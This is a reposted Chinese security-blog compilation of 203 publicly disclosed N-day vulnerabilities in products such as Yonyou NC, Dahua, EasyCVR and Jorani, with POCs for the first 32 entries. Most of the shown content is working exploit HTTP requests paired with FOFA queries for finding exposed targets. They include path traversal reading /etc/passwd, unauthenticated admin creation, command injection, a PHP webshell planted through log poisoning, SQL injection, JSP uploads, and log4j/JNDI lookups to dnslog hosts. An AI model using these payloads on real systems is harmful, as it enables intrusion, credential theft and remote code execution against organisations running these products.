Compilation of publicly disclosed Internet vulnerabilities, 202309-202406 (repost)
Posted 2024-6-5 14:31:29
Compilation of publicly disclosed Internet vulnerabilities, 202309-202406
道一安全 2024-06-05 07:41 Beijing
The following article is reproduced from 网络安全新视界; author: 网络安全新视界.

Purpose: exploitation of N-day vulnerabilities accounts for a large share of real-world attacks, and we hope this article is of some help to defenders. Defensive teams can use its contents to check their own exposure.

Sources: the article covers 203 POCs for high-severity vulnerabilities disclosed publicly in China and abroad between September 2023 and May 2024. All of them come from other public accounts or websites on the Internet and were compiled and published by the 网络安全新视界 team.

Patches: every vulnerability listed is already public; contact the product vendor for patches or remediation guidance.

Content: because of length limits, a few POCs that are too long are replaced with the word PAYLOAD; search for the full POC yourself if you need it.

Legal rights: if any content infringes a party's legitimate rights, contact the 网络安全新视界 team through the backend to have the relevant content removed.

Statement

To keep things simple and easy to browse, there is no "reply to get the full list" gate. This article is the most complete version available; when using it, press F12 and search for keywords.

Bookmark this article if you need it. You can also follow the public account (网络安全新视界).
Contents

01

1. StarRocks MPP database unauthorized access
2. Casdoor static arbitrary file read
3. EasyCVR smart edge gateway userlist information disclosure
4. EasyCVR video management platform arbitrary user creation
5. NUUO NVR video storage management device remote command execution
6. Sangfor NGAF arbitrary file read
7. 鸿运 active safety monitoring cloud platform arbitrary file download
8. Phicomm router RCE
9. Doccms (稻壳CMS) keyword unauthenticated SQL injection
10. Landray EIS smart collaboration platform api.aspx arbitrary file upload
11. Landray EIS smart collaboration platform doc_fileedit_word.aspx SQL injection
12. Jorani < 1.0.2 remote command execution
13. Hongfan (红帆) iOffice ioFileDown arbitrary file read
14. Huaxia ERP (jshERP) sensitive information disclosure
15. Huaxia ERP getAllList information disclosure
16. Hongfan HFOffice 医微云 SQL injection
17. Dahua DSS itcBulletin SQL injection
18. Dahua DSS digital surveillance system user_edit.action information disclosure
19. Dahua DSS digital surveillance system attachment_clearTempFile.action SQL injection
20. Dahua ICC intelligent IoT management platform arbitrary file read
21. Dahua ICC intelligent IoT management platform random remote code execution
22. Dahua ICC intelligent IoT management platform log4j remote code execution
23. Dahua ICC intelligent IoT management platform fastjson remote code execution
24. Yonyou NC 6.5 accept.jsp arbitrary file upload
25. Yonyou NC registerServlet JNDI remote code execution
26. Yonyou NC linkVoucher SQL injection
27. Yonyou NC showcontent SQL injection
28. Yonyou NC grouptemplet arbitrary file upload
29. Yonyou NC down/bill SQL injection
30. Yonyou NC importPml SQL injection
31. Yonyou NC runStateServlet SQL injection
32. Yonyou NC complainbilldetail SQL injection
33. Yonyou NC downTax/download SQL injection
34. Yonyou NC warningDetailInfo interface SQL injection
35. Yonyou NC-Cloud importhttpscer arbitrary file upload
36. Yonyou NC-Cloud soapFormat XXE
37. Yonyou NC-Cloud IUpdateService XXE
38. Yonyou U8 Cloud smartweb2.RPC.d XXE
39. Yonyou U8 Cloud RegisterServlet SQL injection
40. Yonyou U8-Cloud XChangeServlet XXE
41. Yonyou U8 Cloud MeasureQueryByToolAction SQL injection
42. Yonyou GRP-U8 SmartUpload01 file upload
43. Yonyou GRP-U8 userInfoWeb SQL injection leading to RCE
44. Yonyou GRP-U8 bx_dj_check.jsp SQL injection
45. Yonyou GRP-U8 ufgovbank XXE
46. Yonyou GRP-U8 sqcxIndex.jsp SQL injection
47. Yonyou GRP A++Cloud government finance cloud arbitrary file read
48. Yonyou U8 CRM swfupload arbitrary file upload
49. Yonyou U8 CRM uploadfile.php interface arbitrary file upload
50. QDocs Smart School 6.4.1 filterRecords SQL injection
51. 云时空 social commerce ERP validateLoginName SQL injection
52. Weaver E-Office json_common.php SQL injection
53. DPtech VPN Service arbitrary file upload
54. Chanjet T+ getstorewarehousebystore remote code execution
55. Chanjet T+ getdecallusers information disclosure
56. Chanjet T+ RRATableController, Ufida.T.DI.UIP.ashx deserialization RCE
57. Chanjet T+ keyEdit.aspx SQL injection
58. Chanjet T+ KeyInfoList.aspx SQL injection
59. XETUX software dynamiccontent.properties.xhtml remote code execution
60. 百卓 Smart management platform importexport.php SQL injection
61. 浙大恩特 customer resource management system fileupload arbitrary file upload
62. IP-guard WebServer remote command execution
63. IP-guard WebServer arbitrary file read
64. 捷诚 management information system CWSFinanceCommon SQL injection
65. 优卡特 脸爱云 face-recognition smart management platform 1.0.55.0.0.1 privilege bypass
66. Wanhu ezOFFICE collaborative management platform SendFileCheckTemplateEdit SQL injection
67. Wanhu ezOFFICE wpsservlet arbitrary file upload
68. Wanhu ezOFFICE wf_printnum.jsp SQL injection
69. Wanhu ezOFFICE contract_gd.jsp SQL injection
70. Wanhu ezEIP success command execution
71. 邦永 PM2 project management system Global_UserLogin.aspx SQL injection
72. Seeyon OA getAjaxDataServlet XXE
73. GeoServer wms remote code execution
74. Seeyon M3-server 6_1sp1 deserialization RCE
75. Telesquare TLR-2005Ksh router admin.cgi RCE
76. 新开普 campus service management platform service.action remote command execution
77. F22 garment management software UploadHandler.ashx arbitrary file upload
78. pkpmbs construction quality supervision system FileUpload.ashx file upload
79. BYTEVALUE 百为 flow-control router remote command execution
80. 速达天耀 software DesignReportSave.jsp interface arbitrary file upload
81. Uniview (宇视) video surveillance main-cgi password disclosure
82. 思福迪 LOGBASE operations security management system test_qrcode_b remote command execution
83. JeecgBoot testConnection remote command execution
84. Jeecg-Boot JimuReport queryFieldBySql template injection
85. SysAid On-premise < 23.3.36 remote code execution
86. Tosei (Japan) self-service laundry machine RCE
87. DBAppSecurity (安恒) 明御 security gateway aaa_local_web_preview file upload
88. DBAppSecurity 明御 security gateway aaa_portal_auth_config_reset remote command execution
89. Seeyon FE collaborative office platform editflow_manager SQL injection
90. Hikvision IP network intercom broadcast system 3.0.3_20201113_RELEASE remote command execution
91. Hikvision integrated security management platform orgManage/v1/orgs/download arbitrary file read
92. Hikvision operations management centre session command execution
93. Qi An Xin 网神 SecGate3600 firewall app_av_import_save arbitrary file upload
94. Qi An Xin 网神 SecGate3600 firewall obj_area_import_save arbitrary file upload
95. Apache OFBiz < 18.12.10 xmlrpc remote code execution
96. Apache OFBiz 18.12.11 groovy remote code execution
97. OneBlog v2.2.2 Shiro deserialization remote command execution
98. SpiderFlow crawler platform remote command execution
99. Ncast 盈可视 HD smart recording system busiFacade RCE
100. Likeshop 2.5.7.20210311 File.php userFormImage file upload
101. Ivanti Policy Secure 22.6 command injection
102. Ivanti Pulse Connect Secure VPN SSRF leading to remote code execution
103. Ivanti Pulse Connect Secure VPN XXE
104. Totolink T8 settings cstecgi.cgi getSysStatusCfg information disclosure
105. SpringBlade v3.2.0 export-user SQL injection
106. SpringBlade dict-biz/list SQL injection
107. SpringBlade tenant/list SQL injection
108. D-Tale 3.9.0 SSRF
109. Jenkins CLI arbitrary file read
110. GoAnywhere MFT unauthenticated administrator creation
111. WordPress plugin HTML5 Video Player SQL injection
112. WordPress plugin NotificationX SQL injection
113. WordPress Automatic plugin arbitrary file download and SSRF
114. WordPress MasterStudy LMS plugin SQL injection
115. WordPress Bricks Builder <= 1.9.6 RCE
116. WordPress js-support-ticket file upload
117. WordPress LayerSlider plugin SQL injection
118. Beijing 百绰智能 S210 management platform uploadfile.php arbitrary file upload
119. Beijing 百绰智能 S20 backend sysmanageajax.php SQL injection
120. Beijing 百绰智能 S40 management platform import web.php arbitrary file upload
121. Beijing 百绰智能 S42 management platform userattestation.php arbitrary file upload
122. Beijing 百绰智能 s200 management platform /importexport.php SQL injection
123. Atlassian Confluence template injection code execution
124. Hunan 建研 engineering quality inspection system arbitrary file upload
125. ConnectWise ScreenConnect authentication bypass
126. aiohttp path traversal
127. Glodon Linkworks DataExchange.ashx XXE
128. Adobe ColdFusion deserialization
129. Adobe ColdFusion arbitrary file read
130. Laykefu customer service system arbitrary file upload
131. Mini-Tmall <= 20231017 SQL injection
132. JetBrains TeamCity 2023.11.3 and earlier authentication bypass
133. H5 cloud mall file.php file upload
134. Netentsec NS-ASG application security gateway index.php SQL injection
135. Netentsec NS-ASG application security gateway list_ipAddressPolicy.php SQL injection
136. NextChat cors SSRF
137. Fujian Kirisun (科立迅) communication command and dispatch platform down_file.php SQL injection
138. Fujian Kirisun communication command and dispatch platform pwd_update.php SQL injection
139. Fujian Kirisun communication command and dispatch platform editemedia.php SQL injection
140. Fujian Kirisun communication command and dispatch platform get_extension_yl.php SQL injection
141. Kirisun communication command and dispatch management platform ajax_users.php SQL injection
142. CMSV6 vehicle monitoring platform weak password
143. Netis WF2780 v2.1.40144 remote command execution
144. D-Link nas_sharing.cgi command injection
145. Palo Alto Networks PAN-OS GlobalProtect command injection
146. MajorDoMo thumb.php unauthenticated remote code execution
147. RaidenMAILD mail server v.4.9.4 path traversal
148. CrushFTP authentication bypass template injection
149. AJ-Report open-source data dashboard remote command execution
150. AJ-Report 1.4.0 authentication bypass and remote code execution
151. AJ-Report 1.4.1 pageList SQL injection
152. Progress Kemp LoadMaster remote command execution
153. Gradio arbitrary file read
154. 天维尔 fire and rescue operations dispatch platform SQL injection
155. 六零导航页 file.php arbitrary file upload
156. TBK DVR-4104/DVR-4216 OS command injection
157. 美特 CRM upload.jsp arbitrary file upload
158. Mura CMS processAsyncObject SQL injection
159. Infinitt (英飞达) medical imaging archiving and communication system WebJobUpload arbitrary file upload
160. Sonatype Nexus Repository 3 directory traversal and file read
161. Keytop (科拓) fully intelligent parking fee system Webservice.asmx arbitrary file upload
162. 和丰 multimedia information publishing system QH.aspx arbitrary file upload
163. 号卡极团 distribution management system ue_serve.php arbitrary file upload
164. 慧校园 (安校易) management system FileUpProductupdate.aspx arbitrary file upload
165. OrangeHRM 3.3.3 SQL injection
166. 中成科信 ticketing management platform SeatMapHandler SQL injection
167. 精益 value management system DownLoad.aspx arbitrary file read
168. Hongjing (宏景) EHR OutputCode arbitrary file read
169. Hongjing EHR downlawbase SQL injection
170. Hongjing EHR DisplayExcelCustomReport arbitrary file read
171. 通天星 CMSV6 vehicle positioning and monitoring platform SQL injection
172. DT HD licence plate recognition camera arbitrary file read
173. Check Point security gateway arbitrary file read
174. Jinher (金和) OA C6 FileDownLoad.aspx arbitrary file read
175. Jinher OA C6 IncentivePlanFulfill.aspx SQL injection
176. Telecom gateway configuration management system rewrite.php file upload
177. H3C router sensitive information disclosure
178. H3C campus network self-service system flexfileupload arbitrary file upload
179. 建文 engineering management system arbitrary file read
180. 帮管客 CRM jiliyu SQL injection
181. 润申科技 enterprise standardization management system UpdataLogHandler.ashx SQL injection
182. 润申科技 enterprise standardization management system AddNewsHandler.ashx arbitrary user creation
183. Guangzhou 图创 library cluster management system updOpuserPw SQL injection
184. 迅饶科技 X2Modbus gateway AddUser arbitrary user creation
185. Realor (瑞友) 天翼 application virtualization system SQL injection
186. F-logic DataCube3 SQL injection
187. Mura CMS processAsyncObject SQL injection
188. 叁体 佳会 video conferencing attachment arbitrary file read
189. 蓝网科技 clinical viewing system deleteStudy SQL injection
190. Short video matrix marketing system poihuoqu arbitrary file read
191. Esafenet (亿赛通) electronic document security management system NavigationAjax SQL injection
192. 富通天下 foreign trade ERP UploadEmailAttr arbitrary file upload
193. Hillstone (山石网科) 云鉴 security management system setsystemtimeaction command execution
194. 飞企互联 FE enterprise operations management platform uploadAttachmentServlet arbitrary file upload
195. 飞鱼星 Internet access behaviour management system send_order.cgi command execution
196. Henan 风速科技 unified authentication platform password reset
197. 浙大恩特 customer resource management system Quotegask_editAction SQL injection
198. 阿里云盘 (Aliyun Drive) WebDAV command injection
199. Cockpit assetsmanager_upload interface file upload
200. SeaCMS 海洋 video management system dmku SQL injection
201. Founder (方正) omnimedia news editing system binary SQL injection
202. 微擎 (WeEngine) AccountEdit arbitrary file upload
203. 红海云 EHR PtFjk file upload

POC list

02

1. StarRocks MPP database unauthorized access
FOFA: title="StarRocks"
GET /mem_tracker HTTP/1.1
Host: URL

2. Casdoor static arbitrary file read
FOFA: title="Casdoor"
GET /static/../../../../../../../../../../../etc/passwd HTTP/1.1
Host: xx.xx.xx.xx:9999
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

3. EasyCVR smart edge gateway userlist information disclosure
FOFA: title="EasyCVR"
GET /api/v1/userlist?pageindex=0&pagesize=10 HTTP/1.1
Host: xx.xx.xx.xx

4. EasyCVR video management platform arbitrary user creation
FOFA: title="EasyCVR"

Set password to the MD5 hash of the password you want.
POST /api/v1/adduser HTTP/1.1
Host: your-ip
Content-Type: application/x-www-form-urlencoded; charset=UTF-8

name=admin888&username=admin888&password=0e7517141fb53f21ee439b355b5a1d0a&roleid=1

5. NUUO NVR video storage management device remote command execution
FOFA: title="Network Video Recorder Login"
GET /__debugging_center_utils___.php?log=;whoami HTTP/1.1
Host: xx.xx.xx.xx

6. Sangfor NGAF arbitrary file read
FOFA: title="SANGFOR | NGAF"
GET /svpn_html/loadfile.php?file=/etc/./passwd HTTP/1.1
Host:

7. 鸿运 active safety monitoring cloud platform arbitrary file download
FOFA: body="./open/webApi.html"
GET /808gps/MobileAction_downLoad.action?path=/WEB-INF/classes/config/jdbc.properties HTTP/1.1
Host:

8. Phicomm router RCE
FOFA: icon_hash="-1344736688"
After logging in to the backend with the default account admin, perform the following:
POST /cgi-bin/luci/;stok=bcd6ccd2fa5d212ce6431ca22f10b96d/admin/wifireboot HTTP/1.1
Host: x.x.x.x
Cookie: sysauth=<cookie obtained in the login step>
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryxbgjoytz
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36

------WebKitFormBoundaryxbgjoytz
Content-Disposition: form-data; name="wifiRebootEnablestatus"

%s
------WebKitFormBoundaryxbgjoytz
Content-Disposition: form-data; name="wifiRebootrange"

12:00; id;
------WebKitFormBoundaryxbgjoytz
Content-Disposition: form-data; name="wifiRebootendrange"

%s:
------WebKitFormBoundaryxbgjoytz
Content-Disposition: form-data; name="cururl2"


------WebKitFormBoundaryxbgjoytz--

9. Doccms (稻壳CMS) keyword unauthenticated SQL injection
FOFA: app="Doccms"
GET /search/index.php?keyword=PAYLOAD HTTP/1.1
Host: x.x.x.x

The payload is the following statement, double URL-encoded:

' and (extractvalue(1,concat(0x7e,(select user()),0x7e)))#

10. Landray EIS smart collaboration platform api.aspx arbitrary file upload
FOFA: icon_hash="953405444"

After the upload, the response contains the path of the uploaded file.
POST /eis/service/api.aspx?action=saveImg HTTP/1.1
Host: x.x.x.x:xx
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36
Content-Length: 197
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryxdgaqmqu

------WebKitFormBoundaryxdgaqmqu
Content-Disposition: form-data; name="file"; filename="icfitnya.txt"
Content-Type: text/html

jmnqjfdsupxgfidopeixbgsxbf
------WebKitFormBoundaryxdgaqmqu--

11. Landray EIS smart collaboration platform doc_fileedit_word.aspx SQL injection
FOFA: icon_hash="953405444" || app="Landray-EIS智慧协同平台"
GET /dossier/doc_fileedit_word.aspx?recordid=1'%20and%201=@@version--+&edittype=1,1 HTTP/1.1
Host: 127.0.0.1
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close

12. Jorani < 1.0.2 remote command execution
FOFA: title="Jorani"
Step 1: obtain the cookie.
GET /session/login HTTP/1.1
Host: 192.168.190.30
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36
Connection: close
Accept-Encoding: gzip

The csrf_cookie_jorani value in the response is used in the subsequent requests.
HTTP/1.1 200 OK
Connection: close
Cache-Control: no-store, no-cache, must-revalidate
Content-Type: text/html; charset=UTF-8
Date: Tue, 24 Oct 2023 09:34:28 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Tue, 24 Oct 2023 09:34:28 GMT
Pragma: no-cache
Server: Apache/2.4.54 (Debian)
Set-Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; expires=Tue, 24-Oct-2023 11:34:28 GMT; Max-Age=7200; path=/
Set-Cookie: jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r; expires=Tue, 24-Oct-2023 11:34:28 GMT; Max-Age=7200; path=/; HttpOnly
Vary: Accept-Encoding

POST request: writes the function, which runs a base64-encoded command.
POST /session/login HTTP/1.1
Host: 192.168.190.30
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36
Connection: close
Content-Length: 252
Content-Type: application/x-www-form-urlencoded
Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r
Accept-Encoding: gzip

csrf_test_jorani=6ca560f2b0baf3cda87c818a4a15dc77&last_page=session%2Flogin&language=..%2F..%2Fapplication%2Flogs&login=<?php if(isset($_SERVER['HTTP_K1SYJPMHLU4Z'])){system(base64_decode($_SERVER['HTTP_K1SYJPMHLU4Z']));} ?>&CipheredValue=DummyPasswor

Send the following request to the target to run the id command; the header value ZWNobyAtLS0tLS0tLS07aWQgMj4mMTtlY2hvIC0tLS0tLS0tLTs= is the base64-encoded command.
GET /pages/view/log-2023-10-24 HTTP/1.1
Host: 192.168.190.30
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Connection: close
Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r
K1SYJPMHLU4Z: ZWNobyAtLS0tLS0tLS07aWQgMj4mMTtlY2hvIC0tLS0tLS0tLTs=
X-REQUESTED-WITH: XMLHttpRequest
Accept-Encoding: gzip

13. Hongfan (红帆) iOffice ioFileDown arbitrary file read
FOFA: app="红帆-ioffice"
GET /ioffice/prg/interface/ioFileDown.aspx?sFilePath=c:/windows/win.ini HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
Connection: close
Accept: */*
Accept-Encoding: gzip

14. Huaxia ERP (jshERP) sensitive information disclosure
FOFA: body="jshERP-boot"
The leaked content includes usernames and passwords.
GET /jshERP-boot/user/getAllList;.ico HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

15. Huaxia ERP getAllList information disclosure
CVE-2024-0490
FOFA: body="jshERP-boot"
The leaked content includes usernames and passwords.
GET /jshERP-boot/user/a.ico/../getAllList HTTP/1.1
Host: 192.168.40.130:100
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36
Connection: close
Accept: application/signed-exchange;v=b3;q=0.7,*/*;q=0.8
Accept-Language: en
sec-ch-ua-platform: Windows
Accept-Encoding: gzip

16. Hongfan HFOffice 医微云 SQL injection
FOFA: title="HFOffice"
The POC calls a function to compute the MD5 of 1234.
GET /api/switch-value/list?sorts=%5B%7B%22Field%22:%221-CONVERT(VARCHAR(32),%20HASHBYTES(%27MD5%27,%20%271234%27),%202);%22%7D%5D&conditions=%5B%5D&_ZQA_ID=4dc296c6c69905a7 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

17. Dahua DSS itcBulletin SQL injection
FOFA: app="dahua-DSS"
POST /portal/services/itcBulletin?wsdl HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 345
Accept-Encoding: gzip

<s11:Envelope xmlns:s11='http://schemas.xmlsoap.org/soap/envelope/'>
  <s11:Body>
    <ns1:deleteBulletin xmlns:ns1='http://itcbulletinservice.webservice.dssc.dahua.com'>
      <netMarkings>
       (updatexml(1,concat(0x7e,md5(102103122),0x7e),1))) and (1=1
      </netMarkings>
    </ns1:deleteBulletin>
  </s11:Body>
</s11:Envelope>

18. Dahua DSS digital surveillance system user_edit.action information disclosure
FOFA: app="dahua-DSS"
GET /admin/cascade_/user_edit.action?id=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

19. Dahua DSS digital surveillance system attachment_clearTempFile.action SQL injection
FOFA: app="dahua-DSS"
GET /portal/attachment_clearTempFile.action?bean.RecId=1%27)%20AND%20EXTRACTVALUE(8841,CONCAT(0x7e,user(),0x7e))%20AND%20(%27mYhO%27=%27mYhO&bean.TabName=1 HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

20. Dahua ICC intelligent IoT management platform arbitrary file read
FOFA: body="*客户端会小于800*"
GET /evo-apigw/evo-cirs/file/readPic?fileUrl=file:/etc/passwd HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

21. Dahua ICC intelligent IoT management platform random remote code execution
FOFA: icon_hash="-1935899595"
POST /evo-runs/v1.0/auths/sysusers/random HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Length: 161
Accept-Encoding: gzip
Connection: close
Content-Type: application/json;charset=utf-8

{
"a":{
   "@type":"com.alibaba.fastjson.JSONObject",
    {"@type":"java.net.URL","val":"http://farr9frh.dnslog.pw"}
  }""
}

22. Dahua ICC intelligent IoT management platform log4j remote code execution
FOFA: icon_hash="-1935899595"
POST /evo-apigw/evo-brm/1.2.0/user/is-exist HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Content-Type: application/json;charset=utf-8

{
"loginName":"${jndi:ldap://dnslog}"
}

23. Dahua ICC intelligent IoT management platform fastjson remote code execution
FOFA: icon_hash="-1935899595"
POST /evo-runs/v1.0/auths/sysusers/random HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: application/json;charset=utf-8
Accept-Encoding: gzip
Connection: close

{
    "a":{
        "@type":"com.alibaba.fastjson.JSONObject",
       {"@type":"java.net.URL","val":"http://DNSLOG"}
        }""
}

24. Yonyou NC 6.5 accept.jsp arbitrary file upload
FOFA: icon_hash="1085941792"
POST /aim/equipmap/accept.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36
Connection: close
Content-Length: 449
Accept: */*
Accept-Encoding: gzip
Content-Type: multipart/form-data; boundary=---------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc

-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc
Content-Disposition: form-data; name="upload"; filename="2XpU7VbkFeTFZZLbSMlVZwJyOxz.txt"
Content-Type: text/plain

<% out.println("2XpU7Y2Els1K9wZvOlSmrgolNci"); %>
-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc
Content-Disposition: form-data; name="fname"

\webapps\nc_web\2XpU7WZCxP3YJqVaC0EjlHM5oAt.jsp
-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc--

25. Yonyou NC registerServlet JNDI remote code execution
FOFA:app="用友-UFIDA-NC"
POST /portal/registerServlet HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*; q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh,en-US;q=0.9,en-GB;q=0.8,en;q=0.7,zh-CN;q=0.6
Content-Type: application/x-www-form-urlencoded

type=1&dsname=ldap://dnslog

26. Yonyou NC linkVoucher SQL injection
FOFA:app="用友-UFIDA-NC"
GET /portal/pt/yercommon/linkVoucher?pageId=login&pkBill=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

27. Yonyou NC showcontent SQL injection
FOFA:icon_hash="1085941792"
GET /ebvp/infopub/showcontent?id=1'+AND+1=DBMS_PIPE.RECEIVE_MESSAGE(1,5)-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept-Encoding: identity
Connection: close
Content-Type: text/xml; charset=utf-8

28. Yonyou NC grouptemplet arbitrary file upload
FOFA:icon_hash="1085941792"
POST /uapim/upload/grouptemplet?groupid=nc&fileType=jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
Connection: close
Content-Length: 268
Content-type: multipart/form-data; boundary=----------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk
Accept-Encoding: gzip

------------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk
Content-Disposition: form-data; name="upload"; filename="2fiu0YTGkaX2DrJlUZZP5IGvNvk.jsp"
Content-Type: application/octet-stream

<%out.println("2fiu0WM4788fa6NcMHipkIthTTW");%>
------------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk--

/uapim/static/pages/nc/head.jsp

29. Yonyou NC down/bill SQL injection
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
GET /portal/pt/erfile/down/bill?pageId=login&id=1'+AND+4563=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65),5)-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

30. Yonyou NC importPml SQL injection
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
POST /portal/pt/portalpage/importPml?pageId=login&billitem=1'WAITFOR+DELAY+'0:0:5'-- HTTP/1.1
Host: your-ip
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryH970hbttBhoCyj9V
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
Connection: close

------WebKitFormBoundaryH970hbttBhoCyj9V
Content-Disposition: form-data; name="Filedata"; filename="1.jpg"
Content-Type: image/jpeg
------WebKitFormBoundaryH970hbttBhoCyj9V--

31. Yonyou NC runStateServlet SQL injection
version<=6.5
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
GET /portal/pt/servlet/runStateServlet/doPost?pageId=login&proDefPk=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: host
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Content-Type: application/x-www-form-urlencoded

32. Yonyou NC complainbilldetail SQL injection
version= NC633, NC65
FOFA:app="用友-UFIDA-NC"
GET /ebvp/advorappcoll/complainbilldetail?pageId=login&pk_complaint=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
